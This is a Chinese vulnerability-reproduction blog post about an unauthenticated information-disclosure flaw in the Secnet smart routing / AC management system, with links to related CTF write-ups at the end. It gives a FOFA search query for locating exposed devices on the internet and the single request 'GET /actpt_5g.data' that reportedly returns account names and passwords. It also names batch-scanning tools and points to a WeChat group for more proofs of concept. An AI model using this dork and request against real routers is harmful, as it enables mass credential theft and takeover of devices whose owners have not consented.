【漏洞复现】Secnet-智能路由系统 actpt_5g.data信息泄露

0x01 产品简介

Secnet安网智能AC管理系统是广州安网通信技术有限公司(简称"安网通信")的无线AP管理系统

0x02 漏洞描述

Secnet智能路由系统 acipt 5g.data 接口存在信息泄露漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据,导致系统后台权限丢失。

0x03 搜索语法

bash 复制代码
fofa:
title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统"

0x04 漏洞详情

bash 复制代码
GET /actpt_5g.data

0x05 工具批量

nuclei

afrog

xray

POC获取

请使用VX扫一扫加入内部POC分享圈子

相关推荐
mooyuan天天18 天前
CTFHub 信息泄露通关笔记10:SVN泄露(2种方法)
web安全·信息泄露·ctfhub·svn泄露·源码泄露·dvcs ripper
mooyuan天天18 天前
CTFHub 信息泄露通关笔记8:Git泄露 Stash(两种方法渗透)
git stash·信息泄露·ctfhub·git泄露
mooyuan天天19 天前
CTFHub 信息泄露通关笔记2:PHPINFO泄露
信息泄露·ctfhub·phpinfo泄露·phpinfo
mooyuan天天21 天前
CTFHub 信息泄露通关笔记5:备份文件下载 vim文件
信息泄露·ctfhub·vim信息泄露·swp信息泄露
mooyuan天天22 天前
CTFHub 信息泄露通关笔记9:Git泄露 Index
信息泄露·ctfhub·git泄露·githack
H轨迹H8 个月前
Jsmoke-一款强大的js检测工具,浏览器部署即用,使用方便且高效
网络安全·渗透测试·ctf·工具·web漏洞·信息泄露
lally.8 个月前
web信息泄露 ctfshow-web入门web1-web10
web·ctf·信息泄露
H轨迹H8 个月前
CTFHub技能树-信息泄露wp
网络安全·渗透测试·web漏洞·信息泄露·ctfhub
独行soc10 个月前
#渗透测试#漏洞利用#红蓝攻防#信息泄露漏洞#Tomcat信息泄露漏洞的利用
安全·web安全·面试·tomcat·漏洞挖掘·信息泄露·tomcat漏洞
SuperherRo1 年前
spring综合性利用工具-SpringBootVul-GUI(五)
spring boot·spring·漏洞利用·信息泄露